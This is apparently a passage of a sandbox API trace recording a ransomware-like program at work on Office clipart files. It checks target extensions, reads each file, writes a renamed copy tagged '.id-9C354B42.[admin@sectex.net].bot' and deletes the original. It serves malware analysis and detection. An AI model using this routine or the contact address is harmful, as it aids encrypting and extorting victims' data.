	[0145.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63
	[0145.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63
	[0145.575] lstrlenW (lpString=".doc") returned 4
	[0145.575] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.575] lstrlenW (lpString=".docx") returned 5
	[0145.575] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.575] lstrlenW (lpString=".pdf") returned 4
	[0145.575] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.575] lstrlenW (lpString=".xls") returned 4
	[0145.575] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.575] lstrlenW (lpString=".xlsx") returned 5
	[0145.575] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.575] lstrlenW (lpString=".ppt") returned 4
	[0145.575] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63
	[0145.575] lstrlenW (lpString=".zip") returned 4
	[0145.575] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.575] lstrlenW (lpString=".rar") returned 4
	[0145.575] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.575] lstrlenW (lpString=".bz2") returned 4
	[0145.575] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.575] lstrlenW (lpString=".7z") returned 3
	[0145.575] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63
	[0145.575] lstrlenW (lpString=".dbf") returned 4
	[0145.575] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63
	[0145.576] lstrlenW (lpString=".1cd") returned 4
	[0145.576] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63
	[0145.576] lstrlenW (lpString=".jpg") returned 4
	[0145.576] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.576] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.576] lstrlenW (lpString="EN00319_.WMF") returned 12
	[0145.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.576] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2280) returned 1
	[0145.576] CloseHandle (hObject=0x3c0) returned 1
	[0145.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf")) returned 0x20
	[0145.577] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.577] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.577] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0145.578] GetLastError () returned 0x0
	[0145.578] ReadFile (in: hFile=0x3c0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x8e8, lpOverlapped=0x0) returned 1
	[0145.620] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x8f0, lpOverlapped=0x0) returned 1
	[0145.621] ReadFile (in: hFile=0x3c0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.621] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.621] SetEndOfFile (hFile=0x3c4) returned 1
	[0145.621] CloseHandle (hObject=0x3c4) returned 1
	[0145.622] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.622] SetEndOfFile (hFile=0x3c0) returned 1
	[0145.624] CloseHandle (hObject=0x3c0) returned 1
	[0145.624] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.624] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf")) returned 1
	[0145.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63
	[0145.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63
	[0145.625] lstrlenW (lpString=".doc") returned 4
	[0145.625] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.625] lstrlenW (lpString=".docx") returned 5
	[0145.625] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.625] lstrlenW (lpString=".pdf") returned 4
	[0145.625] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.625] lstrlenW (lpString=".xls") returned 4
	[0145.625] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.625] lstrlenW (lpString=".xlsx") returned 5
	[0145.625] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.625] lstrlenW (lpString=".ppt") returned 4
	[0145.625] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63
	[0145.625] lstrlenW (lpString=".zip") returned 4
	[0145.625] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.625] lstrlenW (lpString=".rar") returned 4
	[0145.625] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.625] lstrlenW (lpString=".bz2") returned 4
	[0145.625] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.625] lstrlenW (lpString=".7z") returned 3
	[0145.625] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63
	[0145.625] lstrlenW (lpString=".dbf") returned 4
	[0145.625] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63
	[0145.625] lstrlenW (lpString=".1cd") returned 4
	[0145.625] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63
	[0145.625] lstrlenW (lpString=".jpg") returned 4
	[0145.625] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63
	[0145.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63
	[0145.626] lstrlenW (lpString=".doc") returned 4
	[0145.626] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.626] lstrlenW (lpString=".docx") returned 5
	[0145.626] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.626] lstrlenW (lpString=".pdf") returned 4
	[0145.626] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.626] lstrlenW (lpString=".xls") returned 4
	[0145.626] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.626] lstrlenW (lpString=".xlsx") returned 5
	[0145.626] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.626] lstrlenW (lpString=".ppt") returned 4
	[0145.626] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63
	[0145.626] lstrlenW (lpString=".zip") returned 4
	[0145.626] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.626] lstrlenW (lpString=".rar") returned 4
	[0145.626] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.626] lstrlenW (lpString=".bz2") returned 4
	[0145.626] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.626] lstrlenW (lpString=".7z") returned 3
	[0145.626] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63
	[0145.626] lstrlenW (lpString=".dbf") returned 4
	[0145.626] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63
	[0145.626] lstrlenW (lpString=".1cd") returned 4
	[0145.626] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63
	[0145.626] lstrlenW (lpString=".jpg") returned 4
	[0145.626] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.627] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.627] lstrlenW (lpString="FD00074_.WMF") returned 12
	[0145.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.790] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=17850) returned 1
	[0145.790] CloseHandle (hObject=0x31c) returned 1
	[0145.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf")) returned 0x20
	[0145.857] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0145.858] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.858] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0145.858] GetLastError () returned 0x0
	[0145.858] ReadFile (in: hFile=0x384, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x45ba, lpOverlapped=0x0) returned 1
	[0145.875] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x45c0, lpOverlapped=0x0) returned 1
	[0145.876] ReadFile (in: hFile=0x384, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.876] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.877] SetEndOfFile (hFile=0x3a4) returned 1
	[0145.877] CloseHandle (hObject=0x3a4) returned 1
	[0145.877] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.877] SetEndOfFile (hFile=0x384) returned 1
	[0145.879] CloseHandle (hObject=0x384) returned 1
	[0145.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.879] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf")) returned 1
	[0145.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63
	[0145.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63
	[0145.880] lstrlenW (lpString=".doc") returned 4
	[0145.880] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.880] lstrlenW (lpString=".docx") returned 5
	[0145.880] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.880] lstrlenW (lpString=".pdf") returned 4
	[0145.880] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.880] lstrlenW (lpString=".xls") returned 4
	[0145.880] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.880] lstrlenW (lpString=".xlsx") returned 5
	[0145.880] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.880] lstrlenW (lpString=".ppt") returned 4
	[0145.880] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63
	[0145.880] lstrlenW (lpString=".zip") returned 4
	[0145.880] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.880] lstrlenW (lpString=".rar") returned 4
	[0145.880] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.880] lstrlenW (lpString=".bz2") returned 4
	[0145.881] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.881] lstrlenW (lpString=".7z") returned 3
	[0145.881] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63
	[0145.881] lstrlenW (lpString=".dbf") returned 4
	[0145.881] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63
	[0145.881] lstrlenW (lpString=".1cd") returned 4
	[0145.881] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63
	[0145.881] lstrlenW (lpString=".jpg") returned 4
	[0145.881] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63
	[0145.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63
	[0145.881] lstrlenW (lpString=".doc") returned 4
	[0145.881] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.881] lstrlenW (lpString=".docx") returned 5
	[0145.881] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.881] lstrlenW (lpString=".pdf") returned 4
	[0145.881] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.881] lstrlenW (lpString=".xls") returned 4
	[0145.881] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.881] lstrlenW (lpString=".xlsx") returned 5
	[0145.881] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.881] lstrlenW (lpString=".ppt") returned 4
	[0145.881] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63
	[0145.881] lstrlenW (lpString=".zip") returned 4
	[0145.881] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.881] lstrlenW (lpString=".rar") returned 4
	[0145.881] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.881] lstrlenW (lpString=".bz2") returned 4
	[0145.882] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.882] lstrlenW (lpString=".7z") returned 3
	[0145.882] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63
	[0145.882] lstrlenW (lpString=".dbf") returned 4
	[0145.882] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63
	[0145.882] lstrlenW (lpString=".1cd") returned 4
	[0145.882] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63
	[0145.882] lstrlenW (lpString=".jpg") returned 4
	[0145.882] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.882] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.882] lstrlenW (lpString="FD00297_.WMF") returned 12
	[0145.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00297_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.896] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=18194) returned 1
	[0145.896] CloseHandle (hObject=0x3d8) returned 1
	[0145.896] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00297_.wmf")) returned 0x20
	[0145.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00297_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.925] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.925] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00297_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.925] GetLastError () returned 0x0
	[0145.925] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x4712, lpOverlapped=0x0) returned 1
	[0145.941] WriteFile (in: hFile=0x3d4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x4720, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x4720, lpOverlapped=0x0) returned 1
	[0145.942] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.942] WriteFile (in: hFile=0x3d4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.942] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.942] CloseHandle (hObject=0x3d4) returned 1
	[0145.942] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.942] SetEndOfFile (hFile=0x3a0) returned 1
	[0145.945] CloseHandle (hObject=0x3a0) returned 1
	[0145.945] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.945] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00297_.wmf")) returned 1
	[0145.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63
	[0145.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63
	[0145.946] lstrlenW (lpString=".doc") returned 4
	[0145.946] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.946] lstrlenW (lpString=".docx") returned 5
	[0145.946] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.946] lstrlenW (lpString=".pdf") returned 4
	[0145.946] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.946] lstrlenW (lpString=".xls") returned 4
	[0145.946] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.946] lstrlenW (lpString=".xlsx") returned 5
	[0145.946] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.946] lstrlenW (lpString=".ppt") returned 4
	[0145.946] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63
	[0145.946] lstrlenW (lpString=".zip") returned 4
	[0145.946] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.946] lstrlenW (lpString=".rar") returned 4
	[0145.946] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.946] lstrlenW (lpString=".bz2") returned 4
	[0145.946] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.946] lstrlenW (lpString=".7z") returned 3
	[0145.946] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63
	[0145.946] lstrlenW (lpString=".dbf") returned 4
	[0145.946] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63
	[0145.947] lstrlenW (lpString=".1cd") returned 4
	[0145.947] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63
	[0145.947] lstrlenW (lpString=".jpg") returned 4
	[0145.947] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63
	[0145.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63
	[0145.947] lstrlenW (lpString=".doc") returned 4
